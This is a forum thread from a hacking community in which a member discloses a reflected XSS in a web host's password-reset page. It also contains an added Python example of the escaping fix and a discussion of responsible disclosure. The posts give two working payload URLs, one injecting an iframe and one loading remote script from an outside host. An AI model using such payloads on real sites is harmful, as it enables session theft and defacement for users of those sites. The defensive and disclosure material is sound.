[XSS]000webhost

No explicit questions like "how do I hack xxx.com" please!
Producted
On the way to fame!
Posts: 26
Joined: 13 Oct 2008, 16:00

Post by Producted »

I don't know if this topic fits in this board; I couldn't find any security-related board. Just move or delete it if it doesn't fit :p

Well, I was browsing around the website of my hosting, and I found something interesting: it's an XSS exploit.

http://members.000webhost.com/forgot_password.php?msg=1&email=%3Ciframe%20src=http://producted.890m.com%20width=1024%20height=768%3E%3C/iframe%3E

As dinnerbone has more experience than me, his input is:

http://members.000webhost.com/forgot_password.php?msg=1&email=%3Cscript%20src=http://www.dinnerbone.com/SOM/lolcode.js%3E%3C/script%3E

I have already contacted the staff about this. (Not patched yet)
I'm not responsible for anything you'll do with it!
__
Posted on my blog a few days ago (noobvision.tk)
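The bug in the first post is the `email` query parameter being written back into the page unescaped. The snippet below is an added illustration, not 000webhost's code or anything from this thread: the site's backend language is not confirmed here, so Python stands in for the PHP page, and the confirmation-message template around the email value is a constructed assumption. It decodes the posted URL the way the server would, renders it once unescaped and once HTML-escaped, and uses the standard-library HTML parser to show which tags a browser would actually see in each case.

```python
# Added illustration of the bug in this thread (not 000webhost's code).
# Assumption: forgot_password.php echoes the `email` parameter into a
# confirmation message; TEMPLATE below is a constructed stand-in for it.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The URL from the first post, used as sample input.
SAMPLE_URL = ("http://members.000webhost.com/forgot_password.php?msg=1"
              "&email=%3Ciframe%20src=http://producted.890m.com%20width=1024"
              "%20height=768%3E%3C/iframe%3E")
TEMPLATE = "<p>A new password has been sent to {email}</p>"  # constructed

def email_param(url):
    """Decode the `email` query parameter the way the server sees it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("email", [""])[0]

def render_vulnerable(email):
    """The bug: the raw parameter is pasted straight into the page."""
    return TEMPLATE.format(email=email)

def render_fixed(email):
    """The fix: HTML-escape the value before it reaches the page."""
    return TEMPLATE.format(email=escape(email, quote=True))

class _TagCollector(HTMLParser):
    """Records every start tag a browser-side parser would see."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(rendered, expected=("p",)):
    """Tags in the output that the template itself did not emit."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [t for t in parser.tags if t not in expected]

if __name__ == "__main__":
    value = email_param(SAMPLE_URL)
    print("vulnerable:", injected_tags(render_vulnerable(value)))  # ['iframe']
    print("fixed:     ", injected_tags(render_fixed(value)))       # []
```

Escaping for the HTML text context is the right fix only because the value lands in a text node here; a value written into an attribute, a script block or a URL needs the encoding for that context instead.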

str33tl0rd
Fame ! Where are the chicks?!
Posts: 241
Joined: 04 Jul 2008, 16:00
Location: somewhere

Post by str33tl0rd »

I don't think it is even the right place to bring these issues up here....
'cause with my experience in suck-o... it's only an information-purpose website... I don't think there is much you could get out of that....
Still, the admins will deal with it....

computathug
Administrator
Posts: 2693
Joined: 29 Mar 2007, 16:00
Location: UK

Post by computathug »

Relax, streetlord. Nice find, producted. This is a hacking forum after all. I am glad you did the right thing and contacted the admin. As you know this is not a site for malicious activity, but we do have a section in the backroom for exploits. As this is to do with hacking it can stay here for now, as you don't have access to the backroom yet. The backroom is for valued members that have been around a bit, have a good post count of decent informational posts, and is for people that have passed the suck-o morality test (if the staff feel the person is suitable).

Please introduce yourself, producted, here:

http://www.suck-o.com/modules.php?name= ... topic&t=26

Welcome to suck-o, hope you enjoy your stay and can contribute more to our community :wink:

str33tl0rd
Fame ! Where are the chicks?!
Posts: 241
Joined: 04 Jul 2008, 16:00
Location: somewhere

Post by str33tl0rd »

I told you the admins will do the job....
I was still right... it's not really the right place....:P

Producted
On the way to fame!
Posts: 26
Joined: 13 Oct 2008, 16:00

Post by Producted »

I was looking for the introduction page but I couldn't find it :oops:
Thanks ;)

Gogeta70
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00

Post by Gogeta70 »

str33tl0rd wrote: I told you the admins will do the job....
I was still right... it's not really the right place....:P

I'm not catching on here. You say this isn't the right place?

Isn't finding a vulnerability in a web application that is believed to be secure by its designers/users considered a form of 'hacking'? I say leave it be; it's fine where it's at.

By the way, nice find, producted!
¯\_(ツ)_/¯ It works on my machine...

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

Just as a side note, and an addition to Gogeta's post...

We support any kind of hacking activity that is not malicious or unethical. Found an exploit in a site? Show it and discuss it! But inform the owners of the site first so that they get a chance to fix it ;) Any kind of hacking that is productive in a way that makes you learn, without making life harder for others, is welcome here.
"The best place to hide a tree, is in a forest"

Producted
On the way to fame!
Posts: 26
Joined: 13 Oct 2008, 16:00

Post by Producted »

This exploit was found 3 days ago; before I even posted it on my blog I notified the staff about it. Either they don't care, or they don't have the time to patch it.
